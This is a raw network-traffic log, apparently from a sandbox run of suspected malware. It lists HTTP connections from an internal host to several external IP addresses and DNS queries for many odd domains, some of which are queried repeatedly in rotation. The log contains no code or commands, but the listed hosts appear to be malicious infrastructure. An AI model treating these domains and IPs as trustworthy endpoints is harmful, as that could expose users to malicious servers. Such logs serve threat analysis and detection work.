                                                                    Apr 24, 2024 12:32:17.149499893 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.149646997 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.149776936 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.149863005 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.150012016 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.150158882 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.150166988 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.150257111 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.150265932 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.150274992 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.150536060 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.324089050 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.324234009 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.324310064 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.324371099 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.324481010 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.324570894 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.324595928 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.324732065 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.324791908 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.498445034 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.498617887 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.498821020 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.498913050 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.499036074 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:18.483103991 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:19.500590086 CEST5029880192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:19.669699907 CEST8050298108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:19.669893026 CEST5029880192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:19.671590090 CEST5029880192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:19.841404915 CEST8050298108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:19.841505051 CEST8050298108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:19.841517925 CEST8050298108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:19.841677904 CEST5029880192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:19.844926119 CEST5029880192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:20.013753891 CEST8050298108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:24.859260082 CEST5029980192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:25.194149971 CEST805029984.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:25.194360971 CEST5029980192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:25.195786953 CEST5029980192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:25.530596018 CEST805029984.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:25.530759096 CEST805029984.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:27.717546940 CEST5030080192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:28.050009966 CEST805030084.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:28.050179958 CEST5030080192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:28.051613092 CEST5030080192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:28.384125948 CEST805030084.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:28.384139061 CEST805030084.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:30.576320887 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:30.913392067 CEST805030184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:30.913574934 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:30.916127920 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:30.916146040 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:30.916199923 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:31.253810883 CEST805030184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:31.253992081 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:31.254024029 CEST805030184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:31.254139900 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:31.254182100 CEST805030184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:31.591907024 CEST805030184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:33.435079098 CEST5030280192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:33.769854069 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:33.770071030 CEST5030280192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:33.771473885 CEST5030280192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:34.106252909 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106499910 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106559038 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106703043 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106739044 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106765985 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106792927 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106822968 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106827974 CEST5030280192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:33:21.058289051 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:21.060810089 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:21.060933113 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:21.232223034 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.232234955 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.232425928 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:21.232449055 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.232598066 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.232603073 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:21.232621908 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.232796907 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:21.233099937 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.233107090 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:21.233472109 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:21.404218912 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.404230118 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.404459000 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:21.404484987 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.404618025 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:21.404648066 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.404767036 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.404840946 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:21.404937983 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.404953957 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:21.405098915 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.406665087 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.406853914 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.575828075 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.575994968 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.576045036 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.576443911 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.576750994 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.624972105 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.624984026 CEST8050313203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:21.625135899 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:22.562764883 CEST5031380192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:23.580298901 CEST5031480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:23.752022982 CEST8050314203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:23.752263069 CEST5031480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:23.753855944 CEST5031480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:23.925373077 CEST8050314203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:23.936319113 CEST8050314203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:23.936331987 CEST8050314203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:23.936633110 CEST5031480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:23.938791037 CEST5031480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:33:24.110105991 CEST8050314203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:33:52.230357885 CEST5031980192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:52.535100937 CEST805031991.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:52.535346031 CEST5031980192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:52.536752939 CEST5031980192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:52.842437029 CEST805031991.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:52.842451096 CEST805031991.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:52.842694998 CEST5031980192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:54.040306091 CEST5031980192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:55.057714939 CEST5032080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:55.362334013 CEST805032091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:55.362566948 CEST5032080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:55.363975048 CEST5032080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:55.669560909 CEST805032091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:55.669574976 CEST805032091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:55.669739962 CEST5032080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:56.867741108 CEST5032080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:57.885565996 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:58.195806026 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:58.195935011 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:58.198523998 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:58.198580980 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:58.509119034 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:58.509131908 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:58.509296894 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:58.509365082 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:58.509382010 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:58.509577990 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:58.510179043 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:58.554840088 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:58.819951057 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:58.819962978 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:58.820065022 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:58.820136070 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:58.820161104 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:58.820175886 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:58.820178986 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:58.820225000 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:58.861335039 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:59.130394936 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:59.130505085 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:59.130749941 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:59.130911112 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:59.130923033 CEST805032191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:33:59.131092072 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:33:59.710928917 CEST5032180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:34:00.728535891 CEST5032280192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:34:01.038783073 CEST805032291.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:34:01.038943052 CEST5032280192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:34:01.040357113 CEST5032280192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:34:01.351702929 CEST805032291.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:34:01.351716042 CEST805032291.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:34:01.352093935 CEST5032280192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:34:01.354095936 CEST5032280192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:34:01.664261103 CEST805032291.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:34:28.208427906 CEST5032780192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:34:28.474232912 CEST8050327137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:34:28.474441051 CEST5032780192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:34:28.475857973 CEST5032780192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:34:28.741899014 CEST8050327137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:34:28.741910934 CEST8050327137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:34:28.741945028 CEST8050327137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:34:28.742155075 CEST5032780192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:34:28.744038105 CEST5032780192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:34:29.015516996 CEST8050327137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:34:33.752707958 CEST5032880192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:34:34.055304050 CEST805032851.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:34:34.055547953 CEST5032880192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:34:34.056957006 CEST5032880192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:34:34.359457970 CEST805032851.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:34:34.361831903 CEST805032851.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:34:34.361865997 CEST805032851.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:34:34.362055063 CEST5032880192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:34:34.363991022 CEST5032880192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:34:34.666369915 CEST805032851.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:34:39.377466917 CEST5032980192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:34:39.687460899 CEST805032964.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:34:39.687712908 CEST5032980192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:34:39.689107895 CEST5032980192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:34:39.999948025 CEST805032964.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:34:39.999962091 CEST805032964.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:34:40.000277042 CEST5032980192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:34:40.002187967 CEST5032980192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:34:40.312315941 CEST805032964.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:34:55.357469082 CEST5033080192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:34:55.526874065 CEST8050330108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:34:55.527148962 CEST5033080192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:34:55.528579950 CEST5033080192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:34:55.698564053 CEST8050330108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:34:55.698673964 CEST8050330108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:34:55.698700905 CEST8050330108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:34:55.698875904 CEST5033080192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:34:55.702059984 CEST5033080192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:34:55.871402979 CEST8050330108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:35:01.558796883 CEST5033180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:35:01.893593073 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:01.893747091 CEST5033180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:35:01.895152092 CEST5033180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:35:02.229820967 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230283976 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230298996 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230393887 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230407953 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230420113 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230437040 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230448008 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230458975 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230468035 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230623007 CEST5033180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:35:02.230623007 CEST5033180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:35:02.233844995 CEST5033180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:35:02.568445921 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:07.245038986 CEST5033280192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:35:07.526490927 CEST8050332118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:35:07.526711941 CEST5033280192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:35:07.528105021 CEST5033280192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:35:07.809379101 CEST8050332118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:35:07.810910940 CEST8050332118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:35:07.810924053 CEST8050332118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:35:07.811234951 CEST5033280192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:35:07.813107967 CEST5033280192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:35:08.094558001 CEST8050332118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:35:12.821943045 CEST5033380192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:35:13.103594065 CEST8050333157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:35:13.103799105 CEST5033380192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:35:13.105195999 CEST5033380192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:35:13.377888918 CEST8050333157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:35:13.385056019 CEST8050333157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:35:13.579597950 CEST8050333157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:35:13.579746962 CEST8050333157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:35:13.580049992 CEST5033380192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:35:13.581937075 CEST5033380192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:35:13.863535881 CEST8050333157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:35:23.757350922 CEST5033480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:35:23.934833050 CEST8050334203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:35:23.935041904 CEST5033480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:35:23.936424971 CEST5033480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:35:24.113105059 CEST8050334203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:35:24.130976915 CEST8050334203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:35:24.130990028 CEST8050334203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:35:24.131268024 CEST5033480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:35:24.133148909 CEST5033480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:35:24.310206890 CEST8050334203.161.49.193192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Apr 24, 2024 12:34:06.368002892 CEST6236053192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:34:06.538747072 CEST53623601.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:34:19.988790035 CEST5631153192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:34:20.156210899 CEST53563111.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:34:45.014494896 CEST5188453192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:34:45.182399035 CEST53518841.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:34:50.185257912 CEST5178653192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:34:50.353069067 CEST53517861.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:35:18.585218906 CEST5515353192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:35:18.752221107 CEST53551531.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:35:34.536056995 CEST4989253192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:35:34.703178883 CEST53498921.1.1.1192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 12:27:26.259866953 CEST | 192.168.11.20 | 1.1.1.1 | 0x348b | Standard query (0) | absorbante-calitate.ro | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:27:58.720263004 CEST | 192.168.11.20 | 1.1.1.1 | 0xf9f | Standard query (0) | www.arilyfarlico.ru | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:28:20.225538015 CEST | 192.168.11.20 | 1.1.1.1 | 0x70d3 | Standard query (0) | www.donantedeovulos.space | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:28:34.691147089 CEST | 192.168.11.20 | 1.1.1.1 | 0x730e | Standard query (0) | www.lfsig.autos | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:28:42.907866955 CEST | 192.168.11.20 | 1.1.1.1 | 0x3013 | Standard query (0) | www.muslimsmat.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:28:51.140491009 CEST | 192.168.11.20 | 1.1.1.1 | 0x52f | Standard query (0) | www.kader42.top | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:29:05.309112072 CEST | 192.168.11.20 | 1.1.1.1 | 0x6af | Standard query (0) | www.noispisok.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:29:19.806176901 CEST | 192.168.11.20 | 1.1.1.1 | 0x2e79 | Standard query (0) | www.kansaiwoody.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:29:34.396563053 CEST | 192.168.11.20 | 1.1.1.1 | 0x2e52 | Standard query (0) | www.a-two-spa-salon.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:29:49.066517115 CEST | 192.168.11.20 | 1.1.1.1 | 0xbca5 | Standard query (0) | www.mxgovonline.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:29:57.297667027 CEST | 192.168.11.20 | 1.1.1.1 | 0x31fb | Standard query (0) | www.techfun.info | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:30:11.029062033 CEST | 192.168.11.20 | 1.1.1.1 | 0x4203 | Standard query (0) | www.ogunlewefamily.org.ng | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:30:25.478991985 CEST | 192.168.11.20 | 1.1.1.1 | 0x769e | Standard query (0) | www.387mfyr.sbs | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:30:39.741508007 CEST | 192.168.11.20 | 1.1.1.1 | 0xeeb7 | Standard query (0) | www.nurenose.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:30:54.755465984 CEST | 192.168.11.20 | 1.1.1.1 | 0x2649 | Standard query (0) | www.lm2ue.us | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:31:09.610008001 CEST | 192.168.11.20 | 1.1.1.1 | 0xfd80 | Standard query (0) | www.weave.game | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:31:17.827294111 CEST | 192.168.11.20 | 1.1.1.1 | 0xcbb0 | Standard query (0) | www.whjzff.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:31:54.942539930 CEST | 192.168.11.20 | 1.1.1.1 | 0x2fe8 | Standard query (0) | www.lfsig.autos | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:32:03.175292969 CEST | 192.168.11.20 | 1.1.1.1 | 0x176f | Standard query (0) | www.muslimsmat.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:33:07.254728079 CEST | 192.168.11.20 | 1.1.1.1 | 0x22c8 | Standard query (0) | www.mxgovonline.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:33:28.954407930 CEST | 192.168.11.20 | 1.1.1.1 | 0xb896 | Standard query (0) | www.badai77resmi.net | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:33:43.779334068 CEST | 192.168.11.20 | 1.1.1.1 | 0x564f | Standard query (0) | www.mxgovonline.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:33:51.996134996 CEST | 192.168.11.20 | 1.1.1.1 | 0x4a80 | Standard query (0) | www.concretedailypress.net | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:34:06.368002892 CEST | 192.168.11.20 | 1.1.1.1 | 0x15af | Standard query (0) | www.berryandbird.co.uk | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:34:19.988790035 CEST | 192.168.11.20 | 1.1.1.1 | 0x64db | Standard query (0) | www.weave.game | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:34:45.014494896 CEST | 192.168.11.20 | 1.1.1.1 | 0xaaf7 | Standard query (0) | www.lfsig.autos | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:34:50.185257912 CEST | 192.168.11.20 | 1.1.1.1 | 0xa98 | Standard query (0) | www.muslimsmat.com | A (IP address) | IN (0x0001) | false
